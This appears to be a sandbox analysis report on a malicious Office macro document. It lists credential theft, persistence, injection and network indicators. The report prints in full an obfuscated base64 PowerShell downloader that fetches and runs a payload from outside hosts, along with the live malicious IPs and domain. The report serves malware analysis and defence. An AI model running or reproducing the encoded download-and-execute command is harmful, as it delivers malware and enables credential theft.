VTI Score
100 / 100
|
|
VTI Database Version | 2.6 |
VTI Rule Match Count | 31 |
VTI Rule Type | Documents |
Anti Analysis |
|
|
Try to detect debugger
|
|
|
Check via API "IsDebuggerPresent".
|
||
Browser |
|
|
Read data related to browsing history
|
|
|
Read the browsing history for "Microsoft Internet Explorer".
|
||
Read data related to saved browser credentials
|
|
|
Read saved credentials for "Google Chrome".
|
||
Device |
|
|
Monitor keyboard input
|
|
|
Read the current state of the "VK_CANCEL" by API.
|
||
Information Stealing |
|
|
Read browser data
|
|
|
Possibly trying to readout browser credentials.
|
||
Injection |
|
|
Write into memory of a process running from a created or modified executable
|
|
|
"c:\users\atveydl98z\appdata\local\microsoft\windows\viewcom.exe" modifies memory of "c:\users\atveydl98z\appdata\local\microsoft\windows\viewcom.exe"
|
||
Modify control flow of a process running from a created or modified executable
|
|
|
"c:\users\atveydl98z\appdata\local\microsoft\windows\viewcom.exe" alters context of "c:\users\atveydl98z\appdata\local\microsoft\windows\viewcom.exe"
|
||
Network |
|
|
Download data
|
|
|
Url "65.99.230.27".
|
||
Url "185.82.23.28".
|
||
Url "kerineal.com/simplyelegant/hQoBm/".
|
||
Perform DNS request
|
|
|
Resolve host name "kerineal.com".
|
||
Connect to remote host
|
|
|
Outgoing TCP connection to host "184.168.152.148:80".
|
||
Connect to HTTP server
|
|
|
Remote address "65.99.230.27".
|
||
Remote address "185.82.23.28".
|
||
Remote address "kerineal.com/simplyelegant/hQoBm/".
|
||
PE |
|
|
Execute dropped PE file
|
|
|
Execute dropped file "c:\users\atveydl98z\appdata\local\temp\38763.exe".
|
||
Drop PE file
|
|
|
Drop file "c:\users\atveydl98z\appdata\local\temp\38763.exe".
|
||
Persistence |
|
|
Install system startup script or application
|
|
|
Add ""C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\viewcom.exe"" to windows startup via registry.
|
||
Process |
|
|
Create process
|
|
|
Create process "powershell -e JAB7AHcAYABzAGAAYwBSAEkAcAB0AH0AIAA9ACAAJgAoACIAewAyAH0AewAxAH0AewAwAH0AIgAtAGYAIAAnAG8AYgBqAGUAYwB0ACcALAAnAGUAdwAtACcALAAnAG4AJwApACAALQBDAG8AbQBPAGIAagBlAGMAdAAgACgAIgB7ADQAfQB7ADIAfQB7ADEAfQB7ADMAfQB7ADAAfQAiACAALQBmACAAJwBsAGwAJwAsACcAUwAnACwAJwAuACcALAAnAGgAZQAnACwAJwBXAFMAYwByAGkAcAB0ACcAKQA7ACQAewBXAGUAQgBjAGwAYABpAGAARQBOAHQAfQAgAD0AIAAuACgAIgB7ADAAfQB7ADEAfQB7ADIAfQB7ADMAfQAiACAALQBmACAAJwBuAGUAdwAtACcALAAnAG8AJwAsACcAYgAnACwAJwBqAGUAYwB0ACcAKQAgACgAIgB7ADQAfQB7ADEAfQB7ADMAfQB7ADAAfQB7ADIAfQAiACAALQBmACAAJwBsAGkAZQAnACwAJwB0AGUAbQAuAE4AZQB0ACcALAAnAG4AdAAnACwAJwAuAFcAZQBiAEMAJwAsACcAUwB5AHMAJwApADsAJAB7AHIAYQBgAE4ARABPAE0AfQAgAD0AIAAmACgAIgB7ADMAfQB7ADIAfQB7ADEAfQB7ADAAfQAiACAALQBmACcAYwB0ACcALAAnAGIAagBlACcALAAnAGUAdwAtAG8AJwAsACcAbgAnACkAIAAoACIAewAwAH0AewAxAH0AIgAtAGYAIAAnAHIAYQBuAGQAbwAnACwAJwBtACcAKQA7ACQAewB1AGAAUgBsAFMAfQAgAD0AIAAoACIAewAxADcAfQB7ADIAMQB9AHsAMQAxAH0AewAxADUAfQB7ADEAfQB7ADMAfQB7ADMAOAB9AHsAMwA5AH0AewAzADcAfQB7ADIAMgB9AHsAMQAwAH0AewA2AH0AewAzADEAfQB7ADAAfQB7ADMANAB9AHsAMQA2AH0AewAyADYAfQB7ADMAMAB9AHsAMgAwAH0AewAxADQAfQB7ADkAfQB7ADMANgB9AHsAMgAzAH0AewA4AH0AewAyADQAfQB7ADIANQB9AHsAMgA5AH0AewAyADgAfQB7ADEAMgB9AHsANQB9AHsAMgB9AHsAMQA5AH0AewAyADcAfQB7ADcAfQB7ADEAMwB9AHsANAB9AHsAMQA4AH0AewAzADMAfQB7ADMANQB9AHsAMwAyAH0AIgAgAC0AZgAgACcAZQBhAHQAcwBwAGEAJwAsACcAaQBuAGUAJwAsACcAcwAuAGMAJwAsACcAYQBsAC4AYwBvAG0AJwAsACcAZwAnACwAJwBsAHUAJwAsACcAaAAnACwAJwByAGUAcwBzAC8AJwAsACcAZQBzAC4AbgBlACcALAAnAC8ALABoAHQAdABwACcALAAnACwAJwAsACcALwBrAGUAJwAsACcALwBiAG0AYQBzAHQAZQByAHAAJwAsACcARAAnACwAJwB5AHIAcgAnACwAJwByACcALAAnAC4AdQBrAC8AVgBRAC8ALABoAHQAdABwADoALwAvAHUAbQBlACcALAAnAGgAdAB0ACcALAAnAE4AJwAsACcAbwBtAC8AJwAsACcAbwBtAC8AJwAsACcAcAA6AC8AJwAsACcALwBoAFEAbwBCAG0ALwAnACwAJwAvAC8AbgB5AGUAcgBnACcALAAnAHQALwAnACwAJwBxAHEAcgAvACwAJwAsACcAeAAnACwAJwB3AG8AcgBkAHAAJwAsACcAcAA6AC8AJwAsACcAaAB0AHQAJwAsACcAeAAuAGMAJwAsACcAdAB0AHAAOgAvAC8AJwAsACcASgBGAGgALwAnACwAJwBuAGsAJwAsACcAbQAuAGMAbwAnACwAJwBHACcALAAnADoAJwAsACcAdAAnACwAJwAvAHMAJwAsACcAaQBtAHAAbAB5AGUAbABlAGcAYQBuACcAKQAuACgAIgB7ADEAfQB7ADAAfQAiACAALQBmACcAbABpAHQAJwAsACcAUwBwACcAKQAuAEkAbgB2AG8AawBlACgAJwAsACcAKQA7ACQAewBuAGAAQQBtAEUAfQAgAD0AIAAkAHsAcgBhAG4ARABgAE8ATQB9AC4AKAAiAHsAMQB9AHsAMAB9ACIAIAAtAGYAIAAnAHQAJwAsACcAbgBlAHgAJwApAC4ASQBuAHYAbwBrAGUAKAAxACwAIAA2ADUANQAzADYAKQA7ACQAewBQAGAAQQBUAEgAfQAgAD0AIAAkAHsARQBgAE4AdgA6AGAAVABFAE0AUAB9ACAAKwAgACcAXAAnACAAKwAgACQAewBOAGAAQQBtAEUAfQAgACsAIAAoACIAewAxAH0AewAwAH0AIgAtAGYAJwBlAHgAZQAnACwAJwAuACcAKQA7AGYAbwByAGUAYQBjAGgAKAAkAHsAdQBgAFIAbAB9ACAAaQBuACAAJAB7AFUAUgBgAGwAUwB9ACkAewB0AHIAeQB7ACQAewB3AEUAYgBgAGMATABJAGUAYABOAHQAfQAuACgAIgB7ADEAfQB7ADAAfQB7ADIAfQAiAC0AZgAnAG4AbAAnACwAJwBEAG8AdwAnACwAJwBvAGEAZABGAGkAbABlACcAKQAuAEkAbgB2AG8AawBlACgAJAB7AHUAYABSAEwAfQAuACgAIgB7ADIAfQB7ADEAfQB7ADAAfQAiAC0AZgAgACcAbgBnACcALAAnAGkAJwAsACcAVABvAFMAdAByACcAKQAuAEkAbgB2AG8AawBlACgAKQAsACAAJAB7AFAAYABBAHQAaAB9ACkAOwAmACgAIgB7ADAAfQB7ADEAfQB7ADIAfQAiACAALQBmACAAJwBTACcALAAnAHQAYQByAHQALQAnACwAJwBQAHIAbwBjAGUAcwBzACcAKQAgACQAewBQAEEAYABUAEgAfQA7AGIAcgBlAGEAawA7AH0AYwBhAHQAYwBoAHsALgAoACIAewAyAH0AewAxAH0AewAwAH0AIgAtAGYAJwBpAHQAZQAtAGgAbwBzAHQAJwAsACcAcgAnACwAJwB3ACcAKQAgACQAewBfAH0ALgAiAEUAeABDAGAAZQBgAFAAVABpAE8ATgAiAC4AIgBtAGUAcwBzAGAAQQBgAGcAZQAiADsAfQB9AA0ACgA=".
|
||
Create process "C:\Users\ATVEYD~1\AppData\Local\Temp\38763.exe".
|
||
Create process "C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\viewcom.exe".
|
||
Create process ""C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\viewcom.exe" /scomma "C:\ProgramData\9F1B.tmp"".
|
||
Create process ""C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\viewcom.exe" /scomma "C:\ProgramData\9F1C.tmp"".
|
||
Create process ""C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\viewcom.exe" "C:\ProgramData\9F2D.tmp"".
|
||
Create system object
|
|
|
Create mutex with name "Global\.net clr networking".
|
||
Create mutex with name "MF6003E70".
|
||
Create mutex with name "Global\I40F77A1B".
|
||
Create mutex with name "Global\M40F77A1B".
|
||
Create mutex with name "M68B1B0D0".
|
||
VBA Macro |
|
|
Execute application
|
|
|
VBA.Shell$ bktLAfLdCk + gxNUmgtWxGM + NTmebYUL + aRwMduN + xpZSkkRz + ZvStsRF + PWwDgrB + bDPRdLpa + bNWzAbXfdBp + PHuvNFLBmA + zWtcLfDZ + umLbPFhprKh, 0
|
||
Execute macro on specific worksheet event
|
|
|
Execute macro on "Activate Workbook" event.
|
||
- | OS | |
- | File System | |
- | Hide Tracks | |
- | Kernel | |
- | Masquerade | |
- | User | |
- | YARA |